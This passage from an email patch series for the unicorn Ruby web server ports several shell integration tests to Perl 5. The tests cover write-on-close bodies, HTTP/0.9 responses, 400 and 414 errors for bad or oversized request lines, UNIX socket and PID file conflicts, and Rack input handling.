Date: Mon, 5 Jun 2023 10:12:32 +0000
Subject: [PATCH 03/23] port t0018-write-on-close.sh to Perl 5

This doesn't require restarting, so it's a perfect candidate.
---
 t/integration.ru          | 15 +++++++++++++++
 t/integration.t           | 14 +++++++++++++-
 t/lib.perl                |  2 +-
 t/t0018-write-on-close.sh | 23 -----------------------
 t/write-on-close.ru       | 11 -----------
 5 files changed, 29 insertions(+), 36 deletions(-)
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100644 t/write-on-close.ru

diff --git a/t/integration.ru b/t/integration.ru
index 5183217..12f5d48 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -18,6 +18,20 @@ def restore_status_code
   [ 200, {}, [] ]
 end
 
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+
+def write_on_close
+  [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -26,6 +40,7 @@ def restore_status_code
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index e876c71..3ab5c90 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -4,6 +4,7 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
 
@@ -66,8 +67,19 @@ if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	is($status, $orig_200_status, 'original status restored');
 }
 
+SKIP: {
+	eval { require HTTP::Tiny } or skip "HTTP::Tiny missing: $@", 1;
+	my $ht = HTTP::Tiny->new;
+	my $res = $ht->get("http://$host_port/write_on_close");
+	is($res->{content}, 'Goodbye', 'write-on-close body read');
+}
 
 # ... more stuff here
 undef $ar;
-diag slurp("$tmpdir/err.log") if $ENV{V};
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+is_deeply(\@err, [], 'no unexpected errors in stderr');
+is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index dd9c6b7..12deaf8 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET);
+	SEEK_SET tcp_host_port);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
deleted file mode 100755
index 3afefea..0000000
--- a/t/t0018-write-on-close.sh
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 4 "write-on-close tests for funky response-bodies"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config write-on-close.ru
-	unicorn_wait_start
-}
-
-t_begin "write-on-close response body succeeds" && {
-	test xGoodbye = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
deleted file mode 100644
index 725c4d6..0000000
--- a/t/write-on-close.ru
+++ /dev/null
@@ -1,11 +0,0 @@
-class WriteOnClose
-  def each(&block)
-    @callback = block
-  end
-
-  def close
-    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
-  end
-end
-use Rack::ContentType, "text/plain"
-run(lambda { |_| [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ] })

[-- Attachment #5: 0004-port-t0000-http-basic.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3372 bytes --]

From 1bb4362cee167ac7aeec910d3f52419e391f1e61 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:33 +0000
Subject: [PATCH 04/23] port t0000-http-basic.sh to Perl 5

One more socat dependency down...
---
 t/integration.ru      | 16 ++++++++++++++
 t/integration.t       | 11 ++++++++++
 t/t0000-http-basic.sh | 50 -------------------------------------------
 3 files changed, 27 insertions(+), 50 deletions(-)
 delete mode 100755 t/t0000-http-basic.sh

diff --git a/t/integration.ru b/t/integration.ru
index 12f5d48..c0bef99 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -32,6 +32,21 @@ def write_on_close
   [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
 end
 
+def env_dump(env)
+  require 'json'
+  h = {}
+  env.each do |k,v|
+    case v
+    when String, Integer, true, false; h[k] = v
+    else
+      case k
+      when 'rack.version', 'rack.after_reply'; h[k] = v
+      end
+    end
+  end
+  h.to_json
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -40,6 +55,7 @@ def write_on_close
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3ab5c90..ee22e7e 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -47,6 +47,17 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
 	'rack 3 array headers supported') or diag(explain($hdr));
 
+SKIP: {
+	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
+	$c = tcp_connect($srv);
+	print $c "GET /env_dump\r\n" or die $!;
+	my $json = do { local $/; readline($c) };
+	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
+	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
+	my $env = JSON::PP->new->decode($json);
+	is(ref($env), 'HASH', 'JSON decoded body to hashref');
+	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+}
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
diff --git a/t/t0000-http-basic.sh b/t/t0000-http-basic.sh
deleted file mode 100755
index 8ab58ac..0000000
--- a/t/t0000-http-basic.sh
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 8 "simple HTTP connection tests"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "single request" && {
-	curl -sSfv http://$listen/
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_begin "HTTP/0.9 request should not return headers" && {
-	(
-		printf 'GET /\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-}
-
-t_begin "env.inspect should've put everything on one line" && {
-	test 1 -eq $(count_lines < $tmp)
-}
-
-t_begin "no headers in output" && {
-	if grep ^Connection: $tmp
-	then
-		die "Connection header found in $tmp"
-	elif grep ^HTTP/ $tmp
-	then
-		die "HTTP/ found in $tmp"
-	fi
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #6: 0005-port-t0002-parser-error.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4875 bytes --]

From 2eb7b1662c291ab535ee5dabf5d96194ca6483d4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:34 +0000
Subject: [PATCH 05/23] port t0002-parser-error.sh to Perl 5

Another socat dependency down...
---
 t/integration.t         | 33 +++++++++++++++
 t/lib.perl              |  9 +++-
 t/t0002-parser-error.sh | 94 -----------------------------------------
 3 files changed, 41 insertions(+), 95 deletions(-)
 delete mode 100755 t/t0002-parser-error.sh

diff --git a/t/integration.t b/t/integration.t
index ee22e7e..503b7eb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -85,6 +85,39 @@ SKIP: {
 	is($res->{content}, 'Goodbye', 'write-on-close body read');
 }
 
+if ('bad requests') {
+	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /' or die $!;
+	my $buf = join('', (0..9), 'ab');
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on REQUEST_PATH > (12 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world?a' or die $!;
+	$buf = join('', (0..9));
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on QUERY_STRING > (10 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world#a' or die $!;
+	$buf = join('', (0..9), 'a'..'f');
+	for (0..63) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
+}
+
+
 # ... more stuff here
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
diff --git a/t/lib.perl b/t/lib.perl
index 12deaf8..7d712b5 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port);
+	SEEK_SET tcp_host_port start_req);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -59,6 +59,13 @@ sub tcp_connect {
 	$s;
 }
 
+sub start_req {
+	my ($srv, @req) = @_;
+	my $c = tcp_connect($srv);
+	print $c @req, "\r\n\r\n" or die "print: $!";
+	$c;
+}
+
 sub slurp {
 	open my $fh, '<', $_[0] or die "open($_[0]): $!";
 	local $/;
diff --git a/t/t0002-parser-error.sh b/t/t0002-parser-error.sh
deleted file mode 100755
index 9dc1cd2..0000000
--- a/t/t0002-parser-error.sh
+++ /dev/null
@@ -1,94 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "parser error test"
-
-t_begin "setup and startup" && {
-	unicorn_setup
-	unicorn -D env.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "send a bad request" && {
-	(
-		printf 'GET / HTTP/1/1\r\nHost: example.com\r\n\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-}
-
-dbgcat tmp
-
-t_begin "response should be a 400" && {
-	grep -F 'HTTP/1.1 400 Bad Request' $tmp
-}
-
-t_begin "send a huge Request URI (REQUEST_PATH > (12 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789ab'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (REQUEST_PATH)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (QUERY_STRING > (10 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world?a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (QUERY_STRING)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (FRAGMENT > 1024)" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world#a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<64;i++) print i}')
-		do
-			printf '0123456789abcdef'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (FRAGMENT)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "server stderr should be clean" && check_stderr
-
-t_begin "term signal sent" && kill $unicorn_pid
-
-t_done

[-- Attachment #7: 0006-t-integration.t-use-start_req-to-simplify-test-sligh.patch --]
[-- Type: text/x-diff, Size: 2556 bytes --]

From 0bb06cc0c8c4f5b76514858067bbb2871dda0d6e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:35 +0000
Subject: [PATCH 06/23] t/integration.t: use start_req to simplify test slighly

Less code is usually better.
---
 t/integration.t | 18 ++++++------------
 1 file changed, 6 insertions(+), 12 deletions(-)

diff --git a/t/integration.t b/t/integration.t
index 503b7eb..b7ba1fb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -20,8 +20,7 @@ sub slurp_hdr {
 my ($c, $status, $hdr);
 
 # response header tests
-$c = tcp_connect($srv);
-print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -40,8 +39,7 @@ SKIP: { # Date header check
 };
 
 
-$c = tcp_connect($srv);
-print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -49,8 +47,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	$c = tcp_connect($srv);
-	print $c "GET /env_dump\r\n" or die $!;
+	my $c = start_req($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -60,20 +57,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = tcp_connect($srv);
-print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = tcp_connect($srv);
-	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = tcp_connect($srv);
-	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }

[-- Attachment #8: 0007-port-t0011-active-unix-socket.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6945 bytes --]

From 10c83beaca58df8b92d8228e798559069cd89beb Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:36 +0000
Subject: [PATCH 07/23] port t0011-active-unix-socket.sh to Perl 5

Another socat dependency down...  I've also started turning
FD_CLOEXEC off on a pipe as a mechanism to detect daemonized
process death in tests.
---
 t/active-unix-socket.t        | 117 ++++++++++++++++++++++++++++++++++
 t/integration.ru              |   1 +
 t/t0011-active-unix-socket.sh |  79 -----------------------
 3 files changed, 118 insertions(+), 79 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/t0011-active-unix-socket.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
new file mode 100644
index 0000000..6b5c218
--- /dev/null
+++ b/t/active-unix-socket.t
@@ -0,0 +1,117 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use IO::Socket::UNIX;
+my %to_kill;
+END { kill('TERM', values(%to_kill)) if keys %to_kill }
+my $u1 = "$tmpdir/u1.sock";
+my $u2 = "$tmpdir/u2.sock";
+my $unix_req = sub {
+	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
+	print $s @_, "\r\n\r\n" or die $!;
+	$s;
+};
+{
+	use autodie;
+	open my $fh, '>', "$tmpdir/u1.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u1"
+stderr_path "$tmpdir/err1.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u2.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u2"
+stderr_path "$tmpdir/err2.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u3.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u3.pid"
+listen "$u1"
+stderr_path "$tmpdir/err3.log"
+EOM
+	close $fh;
+}
+
+my @uarg = qw(-D -E none t/integration.ru);
+
+# this pipe will be used to notify us when all daemons die:
+pipe(my ($p0, $p1)) or die "pipe: $!";
+fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+
+# start the first instance
+unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+is($?, 0, 'daemonized 1st process');
+chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
+ok(kill(0, $worker_pid), 'worker is kill-able');
+
+
+# 2nd process conflicts on PID
+unicorn('-c', "$tmpdir/u2.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting PID file fails to start');
+
+chomp(my $pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
+
+chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID unchanged');
+
+
+# 3rd process conflicts on socket
+unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting UNIX socket fails to start');
+
+chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID still unchanged');
+
+chomp($pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
+
+{ # teardown initial process via SIGKILL
+	ok(kill('KILL', delete $to_kill{u1}), 'SIGKILL initial daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(-f "$tmpdir/u.pid", 'pid file stayed after SIGKILL');
+	ok(-S $u1, 'socket stayed after SIGKILL');
+	is(IO::Socket::UNIX->new(Peer => $u1, Type => SOCK_STREAM), undef,
+		'fail to connect to u1');
+	ok(!kill(0, $worker_pid), 'worker gone after parent dies');
+}
+
+# restart the first instance
+{
+	pipe(($p0, $p1)) or die "pipe: $!";
+	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+	is($?, 0, 'daemonized 1st process');
+	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	like($pid2, qr/\A\d+\z/, 'worker running');
+
+	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(!-f "$tmpdir/u.pid", 'pid file gone after SIGTERM');
+	ok(-S $u1, 'socket stays after SIGTERM');
+}
+
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+done_testing;
diff --git a/t/integration.ru b/t/integration.ru
index c0bef99..21f5449 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -57,6 +57,7 @@ def env_dump(env)
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
+    when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/t0011-active-unix-socket.sh b/t/t0011-active-unix-socket.sh
deleted file mode 100755
index fae0b6c..0000000
--- a/t/t0011-active-unix-socket.sh
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "existing UNIX domain socket check"
-
-read_pid_unix () {
-	x=$(printf 'GET / HTTP/1.0\r\n\r\n' | \
-	    socat - UNIX:$unix_socket | \
-	    tail -1)
-	test -n "$x"
-	y="$(expr "$x" : '\([0-9][0-9]*\)')"
-	test x"$x" = x"$y"
-	test -n "$y"
-	echo "$y"
-}
-
-t_begin "setup and start" && {
-	rtmpfiles unix_socket unix_config
-	rm -f $unix_socket
-	unicorn_setup
-	grep -v ^listen < $unicorn_config > $unix_config
-	echo "listen '$unix_socket'" >> $unix_config
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "get pid of worker" && {
-	worker_pid=$(read_pid_unix)
-	t_info "worker_pid=$worker_pid"
-}
-
-t_begin "fails to start with existing pid file" && {
-	rm -f $ok
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "worker pid unchanged" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-	> $r_err
-}
-
-t_begin "fails to start with listening UNIX domain socket bound" && {
-	rm $ok $pid
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-	> $r_err
-}
-
-t_begin "worker pid unchanged (again)" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-}
-
-t_begin "nuking the existing Unicorn succeeds" && {
-	kill -9 $unicorn_pid
-	while kill -0 $unicorn_pid
-	do
-		sleep 1
-	done
-	check_stderr
-}
-
-t_begin "succeeds in starting with leftover UNIX domain socket bound" && {
-	test -S $unix_socket
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-}
-
-t_begin "worker pid changed" && {
-	test x"$(read_pid_unix)" != x$worker_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "no errors" && check_stderr
-
-t_done

[-- Attachment #9: 0008-port-t0100-rack-input-tests.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11722 bytes --]

From b4ed148186295f2d5c8448eab7f2b201615d1e4e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:37 +0000
Subject: [PATCH 08/23] port t0100-rack-input-tests.sh to Perl 5

Yet another socat dependency gone \o/
---
 t/bin/content-md5-put       |  36 -----------
 t/integration.ru            |  27 +++++++-
 t/integration.t             |  97 +++++++++++++++++++++++++++-
 t/lib.perl                  |   3 +-
 t/rack-input-tests.ru       |  21 ------
 t/t0100-rack-input-tests.sh | 124 ------------------------------------
 6 files changed, 124 insertions(+), 184 deletions(-)
 delete mode 100755 t/bin/content-md5-put
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0100-rack-input-tests.sh

diff --git a/t/bin/content-md5-put b/t/bin/content-md5-put
deleted file mode 100755
index 01da0bb..0000000
--- a/t/bin/content-md5-put
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# simple chunked HTTP PUT request generator (and just that),
-# it reads stdin and writes to stdout so socat can write to a
-# UNIX or TCP socket (or to another filter or file) along with
-# a Content-MD5 trailer.
-require 'digest/md5'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-
-bs = ENV['bs'] ? ENV['bs'].to_i : 4096
-
-if ARGV.grep("--no-headers").empty?
-  $stdout.write(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: example.com\r\n" \
-      "Transfer-Encoding: chunked\r\n" \
-      "Trailer: Content-MD5\r\n" \
-      "\r\n"
-    )
-end
-
-digest = Digest::MD5.new
-if buf = $stdin.readpartial(bs)
-  begin
-    digest.update(buf)
-    $stdout.write("%x\r\n" % [ buf.size ])
-    $stdout.write(buf)
-    $stdout.write("\r\n")
-  end while $stdin.read(bs, buf)
-end
-
-digest = [ digest.digest ].pack('m').strip
-$stdout.write("0\r\n")
-$stdout.write("Content-MD5: #{digest}\r\n\r\n")
diff --git a/t/integration.ru b/t/integration.ru
index 21f5449..98528f6 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,29 @@ def env_dump(env)
   h.to_json
 end
 
+def rack_input_tests(env)
+  return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
+  cap = 16384
+  require 'digest/sha1'
+  digest = Digest::SHA1.new
+  input = env['rack.input']
+  case env['PATH_INFO']
+  when '/rack_input/size_first'; input.size
+  when '/rack_input/rewind_first'; input.rewind
+  when '/rack_input'; # OK
+  else
+    abort "bad path: #{env['PATH_INFO']}"
+  end
+  if buf = input.read(rand(cap))
+    begin
+      raise "#{buf.size} > #{cap}" if buf.size > cap
+      digest.update(buf)
+    end while input.read(rand(cap), buf)
+  end
+  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
+    [ digest.hexdigest ] ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -66,6 +89,8 @@ def env_dump(env)
     end # case PATH_INFO (POST)
     # ...
   when 'PUT'
-    # ...
+    case env['PATH_INFO']
+    when %r{\A/rack_input}; rack_input_tests(env)
+    end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index b7ba1fb..8cef561 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,13 +1,16 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# this is the main integration test for things which don't require
+# restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
-
+my $curl = which('curl');
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
 	my ($c) = @_;
 	local $/ = "\r\n\r\n"; # affects both readline+chomp
@@ -17,6 +20,48 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+my %PUT = (
+	chunked_md5 => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		require Digest::MD5;
